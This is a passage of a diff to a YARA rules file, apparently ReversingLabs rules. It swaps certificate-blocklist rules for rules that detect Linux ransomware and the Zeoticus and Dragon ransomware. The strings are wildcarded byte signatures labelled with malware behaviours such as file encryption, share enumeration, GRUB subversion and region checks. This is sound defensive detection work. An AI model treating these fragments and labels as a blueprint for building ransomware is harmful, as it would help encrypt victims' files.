+            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 4C 8D 85 ?? ??
+            ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ??
+            ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7
+            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 B9 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 08 C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 8B 85
+        }
+		$subvert_grub_3 = {
+            48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
+            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
+            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
+            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? EB ?? 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ??
+            48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5
+            ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 83 C4 ?? EB ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ??
+            ?? 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D
+            B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B
+            55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Hua\\xE2\\x80\\x99nan Xingfa Electronic Equipment Firm" and pe.signatures [ i ] . serial == "1c:b2:d5:23:a6:bf:7a:06:66:42:c5:78:de:1c:9b:e4" and 1400889599 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $search_files and ( all of ( $encrypt_files_* ) ) and ( all of ( $subvert_grub_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3A6Ccabb1C62F3Be3Eb03869Fa43Dc4A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zeoticus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zeoticus ransomware."
 		author = "ReversingLabs"
-		id = "b16f7bb7-88fe-5f8f-9592-8d309f556419"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "483b20a4-2c16-5509-a503-2462a53d4d31"
+		date = "2021-03-19"
+		modified = "2021-03-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2394-L2410"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ccb603c8a5f4fb63876e78d763f80a97098c23aa10673c7b04a48026268f57d3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Zeoticus.yara#L1-L90"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "adf42b96139ad98f4253f3eba2c4af1be9545825605e0851185cc15284d9e9a0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zeoticus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares_p1 = {
+            53 55 8B 2D ?? ?? ?? ?? 8B C1 56 57 8B 3D ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51
+            8D 4C 24 ?? 51 6A ?? 8D 4C 24 ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 74
+            ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 89 5C 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 39 73 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? FF 33 8D 44 24
+            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 50 FF D7 A1 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51
+        }
+		$enum_shares_p2 = {
+            50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 56 FF 34
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 56 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ??
+            ?? ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 FF 85 C0 7E ?? 8D
+            5F ?? 8D 44 24 ?? 50 FF 34 BD ?? ?? ?? ?? FF D5 85 C0 0F 44 F3 47 3B 3D ?? ?? ?? ??
+            7C ?? 8B 5C 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ??
+            ?? ?? 8B 3D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 50 FF D7
+            A1 ?? ?? ?? ?? 83 C4 ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 6A ?? FF 34 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ??
+            ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? 83
+            C3 ?? 46 89 5C 24 ?? 89 74 24 ?? 3B 74 24 ?? 0F 82 ?? ?? ?? ?? 8B 5C 24 ?? 53 FF 15
+            ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4
+            ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ??
+            ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ??
+            83 C4 ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83
+            C4 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D
+            04 45 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ??
+            FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 83 FB ?? 75 ?? E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            56 6A ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 E8 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8
+        }
+		$find_files = {
+            81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 01
+            83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? ?? 56 8D 71 ?? 0F 85 ?? ?? ?? ??
+            55 8B 2D ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 66 90 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ??
+            66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 74
+            ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4C 74 ?? 85 C0 74 ?? 33 F6 90
+            FF 34 B5 ?? ?? ?? ?? FF D7 83 F8 ?? 74 ?? 46 83 FE ?? 72 ?? 8D 44 24 ?? 50 FF 34 B5
+            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
+            4C 24 ?? 8D 51 ?? 66 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ??
+            ?? 8D 71 ?? 0F 84 ?? ?? ?? ?? 5F 5D 53 FF 15 ?? ?? ?? ?? 5E 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB8\\xB8\\xE5\\xB7\\x9E\\xE9\\xAA\\x8F\\xE6\\x99\\xAF\\xE9\\x80\\x9A\\xE8\\x81\\x94\\xE6\\x95\\xB0\\xE5\\xAD\\x97\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "3a:6c:ca:bb:1c:62:f3:be:3e:b0:38:69:fa:43:dc:4a" and 1259798399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_864196F01971Dbec7002B48642A7013A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dragon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dragon ransomware."
 		author = "ReversingLabs"
-		id = "80478430-ce01-5fae-bcaf-2b7a445bc20d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "dbeab955-f1fe-57eb-a9a4-c8c885ab7fad"
+		date = "2020-10-30"
+		modified = "2020-10-30"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2412-L2430"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a3173bb08e673caaa64ab22854840a135e891044b165bbc67733c951ec6aa991"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Dragon.yara#L1-L149"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7298c5681deaf04abb6a656cefc09b5ee4096ff7a5028caab1d7b107e97be90a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dragon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 83 EC ?? 89 45 ?? 8B
+            CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1
+        }
+		$remote_connection_p2 = {
+            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
+            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
+            ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
+            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 4D ?? 8D 55 ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 0F 43 4D ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 83 FA
+            ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
+            83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
+            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ??
+            64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 83 EC ?? 89 8D ??
+            ?? ?? ?? 8B D4 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41
+            84 C0 75 ?? 2B CE 8B B5 ?? ?? ?? ?? 51 56 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D
+        }
+		$find_files_2 = {
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 51 8B D4 8D 8D ?? ?? ?? ??
+            8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 84 C0 75 ?? 2B
+            CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ??
+            83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F
+            5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$skip_hk_china_taiwan_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 89 45 ?? 8D 4D ?? 6A ??
+            68 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
+            4D ?? 83 7D ?? ?? 8D 55 ?? 0F 43 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ??
+            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8
+            ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
+            ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
+            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
+            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
+            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+        }
+		$skip_hk_china_taiwan_p2 = {
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? B0 ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 55 ??
+            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
+            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
+            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? E8
+        }
+		$crypt_files = {
+            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 89 45 ?? 89
+            4D ?? 56 8B 75 ?? 85 C9 75 ?? 33 C0 E9 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 83 20
+            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 53 8B C6
+            8B D6 C1 FA ?? 83 E0 ?? 57 6B F8 ?? 89 55 ?? 8B 14 95 ?? ?? ?? ?? 89 7D ?? 8A 5C 3A
+            ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 F7 D0 A8 ?? 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8
+            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? F6 44 3A ?? ?? 74 ?? 6A
+            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 8D 7D ?? AB 56 AB AB E8 ?? ?? ?? ??
